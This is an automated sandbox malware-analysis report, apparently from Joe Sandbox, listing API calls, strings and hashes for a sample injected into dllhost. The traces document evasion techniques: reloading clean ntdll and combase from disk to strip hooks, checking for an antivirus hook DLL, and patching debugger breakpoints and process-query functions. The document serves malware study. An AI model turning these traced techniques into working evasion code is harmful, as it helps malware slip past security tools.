                                                                                  • GetModuleHandleA.KERNEL32(aswhook.dll,7FE31BBA), ref: 7FE31F35
                                                                                  • DisableThreadLibraryCalls.KERNEL32(00000000), ref: 7FE31F40
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000003.1704847684.000000007FE31000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE31000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_3_7fe31000_S7AGd447vH.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallsDisableHandleLibraryModuleThread
                                                                                  • String ID: aswhook.dll
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1708289250.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1708549958.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_S7AGd447vH.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CommandLine
                                                                                  • String ID: `%Y
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32 ref: 7FE319B9
                                                                                    • Part of subcall function 7FE31BC0: GetModuleHandleA.KERNEL32(kernel32.dll,?,?,7FE319C5,00000000), ref: 7FE31BD6
                                                                                    • Part of subcall function 7FE31BC0: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 7FE31BE2
                                                                                    • Part of subcall function 7FE31C06: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,00000000), ref: 7FE31C25
                                                                                    • Part of subcall function 7FE31C06: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 7FE31C46
                                                                                    • Part of subcall function 7FE31C06: GetFileSize.KERNEL32(00000000,00000000), ref: 7FE31C5D
                                                                                    • Part of subcall function 7FE31C06: malloc.MSVCRT ref: 7FE31C67
                                                                                    • Part of subcall function 7FE31C06: ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 7FE31C82
                                                                                    • Part of subcall function 7FE31C06: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004), ref: 7FE31CB6
                                                                                    • Part of subcall function 7FE31C06: memcpy.MSVCRT(00000000,00000000,7FE319D1), ref: 7FE31CC8
                                                                                    • Part of subcall function 7FE31C06: memcpy.MSVCRT(?,00000000,?), ref: 7FE31CEE
                                                                                    • Part of subcall function 7FE31C06: free.MSVCRT ref: 7FE31D06
                                                                                    • Part of subcall function 7FE31C06: CloseHandle.KERNEL32(7FE319D1), ref: 7FE31D10
                                                                                  • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 7FE319E5
                                                                                  • memcpy.MSVCRT(Function_00000000,00000000,?), ref: 7FE31A93
                                                                                  • GetCurrentProcess.KERNEL32 ref: 7FE31AC5
                                                                                  • IsBadReadPtr.KERNEL32(?,?), ref: 7FE31B09
                                                                                  • IsBadReadPtr.KERNEL32(00000000,?), ref: 7FE31B17
                                                                                  • memcmp.MSVCRT(?,00000000,?), ref: 7FE31B26
                                                                                  • memcpy.MSVCRT(00000000,?,?,?,?,00001000,00000040,?), ref: 7FE31B5B
                                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 7FE31B98
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000003.1749735106.000000007FE31000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE31000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_3_7fe31000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy$FileHandleRead$CurrentModuleProcessVirtual$AddressAllocCloseCreateEnvironmentExpandFreeProcSizeStringsfreemallocmemcmp
                                                                                  • String ID: %Systemroot%\system32\combase.dll$%Systemroot%\system32\ntdll.dll$ZwProtectVirtualMemory$combase.dll$ntdll.dll
                                                                                  APIs
                                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,00000000), ref: 7FE31C25
                                                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 7FE31C46
                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 7FE31C5D
                                                                                  • malloc.MSVCRT ref: 7FE31C67
                                                                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 7FE31C82
                                                                                  • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004), ref: 7FE31CB6
                                                                                  • memcpy.MSVCRT(00000000,00000000,7FE319D1), ref: 7FE31CC8
                                                                                  • memcpy.MSVCRT(?,00000000,?), ref: 7FE31CEE
                                                                                  • free.MSVCRT ref: 7FE31D06
                                                                                  • CloseHandle.KERNEL32(7FE319D1), ref: 7FE31D10
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000003.1749735106.000000007FE31000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE31000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_3_7fe31000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$memcpy$AllocCloseCreateEnvironmentExpandHandleReadSizeStringsVirtualfreemalloc
                                                                                  • String ID: MZ
                                                                                  APIs
                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 005F0391
                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00101000,00000040), ref: 005F04A1
                                                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 005F050B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000003.1749810570.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_3_5f0000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: Virtual$Alloc$Free
                                                                                  • String ID: !$S$k
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(7FE31BB3,00000000,?,?,?,?,?,?,?,7FE31BB3,combase.dll,%Systemroot%\system32\combase.dll), ref: 7FE31D8C
                                                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,7FE31BB3,combase.dll,%Systemroot%\system32\combase.dll), ref: 7FE31DA1
                                                                                    • Part of subcall function 7FE31C06: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,00000000), ref: 7FE31C25
                                                                                    • Part of subcall function 7FE31C06: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 7FE31C46
                                                                                    • Part of subcall function 7FE31C06: GetFileSize.KERNEL32(00000000,00000000), ref: 7FE31C5D
                                                                                    • Part of subcall function 7FE31C06: malloc.MSVCRT ref: 7FE31C67
                                                                                    • Part of subcall function 7FE31C06: ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 7FE31C82
                                                                                    • Part of subcall function 7FE31C06: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004), ref: 7FE31CB6
                                                                                    • Part of subcall function 7FE31C06: memcpy.MSVCRT(00000000,00000000,7FE319D1), ref: 7FE31CC8
                                                                                    • Part of subcall function 7FE31C06: memcpy.MSVCRT(?,00000000,?), ref: 7FE31CEE
                                                                                    • Part of subcall function 7FE31C06: free.MSVCRT ref: 7FE31D06
                                                                                    • Part of subcall function 7FE31C06: CloseHandle.KERNEL32(7FE319D1), ref: 7FE31D10
                                                                                  • IsBadReadPtr.KERNEL32(7FE31BB3,00000080), ref: 7FE31E42
                                                                                  • IsBadReadPtr.KERNEL32(7FE31BB3,00000080), ref: 7FE31E4E
                                                                                    • Part of subcall function 7FE31EEA: memcmp.MSVCRT(7FE31BB3,7FE31E6D,7FE31E6D,7FE31BB3,?,00000080,?,7FE31E6D,7FE31BB3,7FE31BB3,00000080,?,?,?,00000000), ref: 7FE31F0D
                                                                                  • memcpy.MSVCRT(7FE31BB3,7FE31BB3,?,?,?,00001000,00000040,00000004,?,?,?,?,?,?,00000000), ref: 7FE31EA2
                                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,00000000,?,?,?,?,?,?,?,7FE31BB3,combase.dll), ref: 7FE31EDF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000003.1749735106.000000007FE31000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE31000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_3_7fe31000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileReadmemcpy$HandleVirtual$AllocCloseCreateCurrentEnvironmentExpandFreeModuleProcessSizeStringsfreemallocmemcmp
                                                                                  • String ID:
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,7FE319C5,00000000), ref: 7FE31BD6
                                                                                  • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 7FE31BE2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000003.1749735106.000000007FE31000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE31000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_3_7fe31000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProc
                                                                                  • String ID: IsWow64Process$kernel32.dll
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000003.1749735106.000000007FE31000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE31000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_3_7fe31000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset
                                                                                  • String ID: $$$combase.dll
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(aswhook.dll,7FE31BBA), ref: 7FE31F35
                                                                                  • DisableThreadLibraryCalls.KERNEL32(00000000), ref: 7FE31F40
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000003.1749735106.000000007FE31000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE31000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_3_7fe31000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallsDisableHandleLibraryModuleThread
                                                                                  • String ID: aswhook.dll
                                                                                  • API String ID: 78584604-2561582699
                                                                                  • Opcode ID: d74cb2dd0cf48b6df68db21c6a49973dbb8b91d3aa3364bb512230de829d39d3
                                                                                  • Instruction ID: ebe0215c953d00e54fa583c8f1e870bcfd19df2d92563f2361f67c6791dd81a8
                                                                                  • Opcode Fuzzy Hash: d74cb2dd0cf48b6df68db21c6a49973dbb8b91d3aa3364bb512230de829d39d3
                                                                                  • Instruction Fuzzy Hash: CAB012BDF002045BBE101F734B0CB0935AF6F8237335482D46883D9000CF24C014CD20

                                                                                  Execution Graph

                                                                                  Execution Coverage:26.7%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:0%
                                                                                  Total number of Nodes:191
                                                                                  Total number of Limit Nodes:4

                                                                                  Callgraph


                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(ntdll.dll,ZwQueryInformationProcess,?,?,?,?,7FE42071), ref: 7FE42251
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 7FE4225A
                                                                                  • GetCurrentProcess.KERNEL32(00000022,00000000,00000004,?,?,?,?,7FE42071), ref: 7FE4226F
                                                                                  • NtQueryInformationProcess.NTDLL(00000000,?,?,?,7FE42071), ref: 7FE42276
                                                                                  • GetModuleHandleA.KERNEL32(ntdll,ZwQueryInformationProcess,?,?,?,7FE42071), ref: 7FE42291
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 7FE42294
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.1820589605.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7fe40000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProcProcess$CurrentInformationQuery
                                                                                  • String ID: ZwQueryInformationProcess$ntdll$ntdll.dll
                                                                                  • API String ID: 460765316-442758927
                                                                                  • Opcode ID: b828806d0fd79351611bb38ed87b16235be445b549a03474a29fa1beab70e088
                                                                                  • Instruction ID: c43e8887edb143a630375315b9d9582e51a2876b0aac7502fde47bf8d8371ccf
                                                                                  • Opcode Fuzzy Hash: b828806d0fd79351611bb38ed87b16235be445b549a03474a29fa1beab70e088
                                                                                  • Instruction Fuzzy Hash: 7B01D67BE0030CBBEB0097E5AC49FBE7BBCEB88265F24011AF901E3040D674DA158B64

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000,7FE4208A), ref: 7FE42DFB
                                                                                    • Part of subcall function 7FE432D4: GetProcessHeap.KERNEL32(00000000,7FE453D0,00000000,7FE42E0C,7FE453D0), ref: 7FE43310
                                                                                    • Part of subcall function 7FE432D4: RtlAllocateHeap.NTDLL(00000000,00000008,?), ref: 7FE4331F
                                                                                    • Part of subcall function 7FE432D4: memcpy.NTDLL(00000000,22283E58,?), ref: 7FE4333F
                                                                                    • Part of subcall function 7FE432D4: memcpy.NTDLL(?,22283E58,00000000), ref: 7FE4336A
                                                                                    • Part of subcall function 7FE432D4: IsBadReadPtr.KERNEL32(?,?), ref: 7FE43391
                                                                                    • Part of subcall function 7FE432D4: HeapFree.KERNEL32(?,00000000,?), ref: 7FE433AA
                                                                                  • HeapDestroy.KERNEL32(?), ref: 7FE42E1A
                                                                                  • IsBadReadPtr.KERNEL32(00000000,?), ref: 7FE42E5F
                                                                                  • VirtualProtect.KERNELBASE(00000000,?,00000004,00000000), ref: 7FE42E88
                                                                                  • memcpy.NTDLL(00000000,?,?), ref: 7FE42E94
                                                                                  • VirtualProtect.KERNELBASE(00000000,?,00000000,00000000), ref: 7FE42EA7
                                                                                  • VirtualProtect.KERNELBASE(?,0000010A,00000004,00000000), ref: 7FE42ED7
                                                                                  • memset.NTDLL ref: 7FE42EE7
                                                                                  • memcpy.NTDLL(?,?,00000000), ref: 7FE42F07
                                                                                  • GetTickCount.KERNEL32 ref: 7FE42F7D
                                                                                  • VirtualProtect.KERNELBASE(?,?,00000020,00000000), ref: 7FE4303F
                                                                                  • VirtualAlloc.KERNELBASE(00000000,00001000,00001000,00000040), ref: 7FE43094
                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 7FE430A9
                                                                                  • RtlCaptureContext.NTDLL(0000040C), ref: 7FE430C2
                                                                                  • memcpy.NTDLL(00000000,7FE452E4,00000011), ref: 7FE430D0
                                                                                  • memcpy.NTDLL(00000011,7FE433D2,000003EF,00000000,7FE452E4,00000011), ref: 7FE430E3
                                                                                  • GetProcessHeap.KERNEL32 ref: 7FE43103
                                                                                  • GetModuleHandleA.KERNEL32(ntdll.dll,ZwContinue), ref: 7FE4312D
                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 7FE4313A
                                                                                  • GetProcAddress.KERNEL32(00000000,VirtualFree), ref: 7FE43146
                                                                                  • GetProcAddress.KERNEL32(00000000,HeapDestroy), ref: 7FE43153
                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00101000,00000040,00000000,7FE4208A), ref: 7FE431AF
                                                                                  • memcpy.NTDLL(00000000,X>(",?), ref: 7FE431C5
                                                                                  • memcpy.NTDLL(?,?,?), ref: 7FE431F4
                                                                                  • GetTickCount.KERNEL32 ref: 7FE4326F
                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 7FE432C9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.1820589605.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7fe40000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy$Virtual$Heap$Protect$AddressHandleModuleProc$AllocCountFreeProcessReadTick$AllocateCaptureContextDestroymemset
                                                                                  • String ID: $HeapDestroy$VirtualFree$X>("$ZwContinue$kernel32.dll$ntdll.dll
                                                                                  • API String ID: 1144457544-420683181
                                                                                  • Opcode ID: aec24aa56fb9883356a3063263abbe9963df0538df00baee4cba9280c20f54ed
                                                                                  • Instruction ID: 732545531038e7714358bfe6ab87001606b6185c74c7238915c452f030bfd5c1
                                                                                  • Opcode Fuzzy Hash: aec24aa56fb9883356a3063263abbe9963df0538df00baee4cba9280c20f54ed
                                                                                  • Instruction Fuzzy Hash: 62F1CC76A00305AFDB21CFA5DC84BAAB7BAFF44348F10552DF906AB241D734E994EB50
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32 ref: 7FE319B9
                                                                                    • Part of subcall function 7FE31BC0: GetModuleHandleA.KERNEL32(kernel32.dll,?,?,7FE319C5,00000000), ref: 7FE31BD6
                                                                                    • Part of subcall function 7FE31BC0: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 7FE31BE2
                                                                                    • Part of subcall function 7FE31C06: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,00000000), ref: 7FE31C25
                                                                                    • Part of subcall function 7FE31C06: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 7FE31C46
                                                                                    • Part of subcall function 7FE31C06: GetFileSize.KERNEL32(00000000,00000000), ref: 7FE31C5D
                                                                                    • Part of subcall function 7FE31C06: malloc.MSVCRT ref: 7FE31C67
                                                                                    • Part of subcall function 7FE31C06: ReadFile.KERNELBASE(00000000,00000000,?,?,00000000), ref: 7FE31C82
                                                                                    • Part of subcall function 7FE31C06: VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004), ref: 7FE31CB6
                                                                                    • Part of subcall function 7FE31C06: memcpy.MSVCRT(00000000,00000000,7FE319D1), ref: 7FE31CC8
                                                                                    • Part of subcall function 7FE31C06: memcpy.MSVCRT(?,00000000,?), ref: 7FE31CEE
                                                                                    • Part of subcall function 7FE31C06: free.MSVCRT ref: 7FE31D06
                                                                                    • Part of subcall function 7FE31C06: CloseHandle.KERNELBASE(7FE319D1), ref: 7FE31D10
                                                                                  • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 7FE319E5
                                                                                  • memcpy.MSVCRT(Function_00000000,00000000,?), ref: 7FE31A93
                                                                                  • GetCurrentProcess.KERNEL32 ref: 7FE31AC5
                                                                                  • IsBadReadPtr.KERNEL32(?,?), ref: 7FE31B09
                                                                                  • IsBadReadPtr.KERNEL32(00000000,?), ref: 7FE31B17
                                                                                  • memcmp.MSVCRT(?,00000000,?), ref: 7FE31B26
                                                                                  • memcpy.MSVCRT(00000000,?,?,?,?,00001000,00000040,?), ref: 7FE31B5B
                                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 7FE31B98
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000003.1819863860.000000007FE31000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE31000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_3_7fe31000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: memcpy$FileHandleRead$CurrentModuleProcessVirtual$AddressAllocCloseCreateEnvironmentExpandFreeProcSizeStringsfreemallocmemcmp
                                                                                  • String ID: %Systemroot%\system32\combase.dll$%Systemroot%\system32\ntdll.dll$ZwProtectVirtualMemory$combase.dll$ntdll.dll
                                                                                  • API String ID: 288383237-3427567192
                                                                                  • Opcode ID: f1a208d53d8805e2378b0198be8e792b5a9b92c2038927b6b191f4b3b12e1ae7
                                                                                  • Instruction ID: e13732920362c93adadf7f955773acdb4f5f8b940de6f6bd2b25e23fa99a90bd
                                                                                  • Opcode Fuzzy Hash: f1a208d53d8805e2378b0198be8e792b5a9b92c2038927b6b191f4b3b12e1ae7
                                                                                  • Instruction Fuzzy Hash: 4851B375D00319EFDF118FA5C888EEEB7BAEF84335F90415EE802A6140E7396A44CB61
                                                                                  APIs
                                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,00000000), ref: 7FE31C25
                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 7FE31C46
                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 7FE31C5D
                                                                                  • malloc.MSVCRT ref: 7FE31C67
                                                                                  • ReadFile.KERNELBASE(00000000,00000000,?,?,00000000), ref: 7FE31C82
                                                                                  • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004), ref: 7FE31CB6
                                                                                  • memcpy.MSVCRT(00000000,00000000,7FE319D1), ref: 7FE31CC8
                                                                                  • memcpy.MSVCRT(?,00000000,?), ref: 7FE31CEE
                                                                                  • free.MSVCRT ref: 7FE31D06
                                                                                  • CloseHandle.KERNELBASE(7FE319D1), ref: 7FE31D10
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000003.1819863860.000000007FE31000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE31000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_3_7fe31000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$memcpy$AllocCloseCreateEnvironmentExpandHandleReadSizeStringsVirtualfreemalloc
                                                                                  • String ID: MZ

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(ntdll.dll,00000000,7FE4208A,?,EC8B5500,7FE416D2,?,?,7FE4208A,?,?,?,?,?,00000000,?), ref: 7FE416E0
                                                                                  • GetProcAddress.KERNEL32(00000000,DbgBreakPoint), ref: 7FE416F9
                                                                                  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,7FE4208A,?,?,EC8B5500,7FE416D2,?,?,7FE4208A,?,?,?), ref: 7FE41711
                                                                                  • VirtualProtect.KERNELBASE(00000000,00000004,?,7FE4208A,?,?,EC8B5500,7FE416D2,?,?,7FE4208A,?,?,?), ref: 7FE41722
                                                                                  • GetProcAddress.KERNEL32(00000000,DbgUserBreakPoint), ref: 7FE4172A
                                                                                  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,?,?,EC8B5500,7FE416D2,?,?,7FE4208A,?,?,?,?,?,00000000), ref: 7FE4173D
                                                                                  • VirtualProtect.KERNELBASE(00000000,00000004,7FE4208A,?,?,EC8B5500,7FE416D2,?,?,7FE4208A,?,?,?,?,?,00000000), ref: 7FE4174E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.1820589605.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7fe40000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual$AddressProc$HandleModule
                                                                                  • String ID: DbgBreakPoint$DbgUserBreakPoint$ntdll.dll

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 7FE4257F: lstrlen.KERNEL32(?,?,?,00000000,?,7FE41777,?,/etc/plugins.plist,?), ref: 7FE4259C
                                                                                  • strncmp.NTDLL ref: 7FE4180B
                                                                                  • malloc.MSVCRT ref: 7FE4186C
                                                                                  • memcpy.NTDLL(00000008,?,?), ref: 7FE41889
                                                                                  • free.MSVCRT ref: 7FE418FC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.1820589605.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7fe40000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: freelstrlenmallocmemcpystrncmp
                                                                                  • String ID: /etc/plugins.plist$MZ$x86

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.1820589605.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7fe40000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: callocfreemallocmemcpy
                                                                                  • String ID: !$S$k
                                                                                  APIs
                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,?,?), ref: 004E0391
                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00101000,00000040), ref: 004E04A1
                                                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 004E050B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000003.1819957448.00000000004E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004E0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_3_4e0000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: Virtual$Alloc$Free
                                                                                  • String ID: !$S$k
                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(7FE31BB3,00000000,?,?,?,?,?,?,?,7FE31BB3,combase.dll,%Systemroot%\system32\combase.dll), ref: 7FE31D8C
                                                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,7FE31BB3,combase.dll,%Systemroot%\system32\combase.dll), ref: 7FE31DA1
                                                                                    • Part of subcall function 7FE31C06: ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,00000000), ref: 7FE31C25
                                                                                    • Part of subcall function 7FE31C06: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 7FE31C46
                                                                                    • Part of subcall function 7FE31C06: GetFileSize.KERNEL32(00000000,00000000), ref: 7FE31C5D
                                                                                    • Part of subcall function 7FE31C06: malloc.MSVCRT ref: 7FE31C67
                                                                                    • Part of subcall function 7FE31C06: ReadFile.KERNELBASE(00000000,00000000,?,?,00000000), ref: 7FE31C82
                                                                                    • Part of subcall function 7FE31C06: VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004), ref: 7FE31CB6
                                                                                    • Part of subcall function 7FE31C06: memcpy.MSVCRT(00000000,00000000,7FE319D1), ref: 7FE31CC8
                                                                                    • Part of subcall function 7FE31C06: memcpy.MSVCRT(?,00000000,?), ref: 7FE31CEE
                                                                                    • Part of subcall function 7FE31C06: free.MSVCRT ref: 7FE31D06
                                                                                    • Part of subcall function 7FE31C06: CloseHandle.KERNELBASE(7FE319D1), ref: 7FE31D10
                                                                                  • IsBadReadPtr.KERNEL32(7FE31BB3,00000080), ref: 7FE31E42
                                                                                  • IsBadReadPtr.KERNEL32(7FE31BB3,00000080), ref: 7FE31E4E
                                                                                    • Part of subcall function 7FE31EEA: memcmp.MSVCRT(7FE31BB3,7FE31E6D,7FE31E6D,7FE31BB3,?,00000080,?,7FE31E6D,7FE31BB3,7FE31BB3,00000080,?,?,?,00000000), ref: 7FE31F0D
                                                                                  • memcpy.MSVCRT(7FE31BB3,7FE31BB3,?,?,?,00001000,00000040,00000004,?,?,?,?,?,?,00000000), ref: 7FE31EA2
                                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,00000000,?,?,?,?,?,?,?,7FE31BB3,combase.dll), ref: 7FE31EDF
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000003.1819863860.000000007FE31000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE31000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_3_7fe31000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileReadmemcpy$HandleVirtual$AllocCloseCreateCurrentEnvironmentExpandFreeModuleProcessSizeStringsfreemallocmemcmp

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetProcAddress.KERNEL32(?,ZwQueryInformationProcess), ref: 7FE41F00
                                                                                  • VirtualProtect.KERNELBASE(00000001,00000004,00000040,?,7FE41EA9,00000000,?,?,?,?), ref: 7FE41F48
                                                                                  • InterlockedExchange.KERNEL32(?,7FE41EA4), ref: 7FE41F57
                                                                                  • VirtualProtect.KERNELBASE(?,00000004,?,?), ref: 7FE41F69
                                                                                  Strings
                                                                                  • ZwQueryInformationProcess, xrefs: 7FE41EF8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.1820589605.000000007FE40000.00000040.00001000.00020000.00000000.sdmp, Offset: 7FE40000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_7fe40000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual$AddressExchangeInterlockedProc
                                                                                  • String ID: ZwQueryInformationProcess

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 7FE41E1C
                                                                                  • GetProcAddress.KERNEL32(00000000,KiUserExceptionDispatcher), ref: 7FE41E2A
                                                                                    • Part of subcall function 7FE411B0: memset.NTDLL ref: 7FE411D2
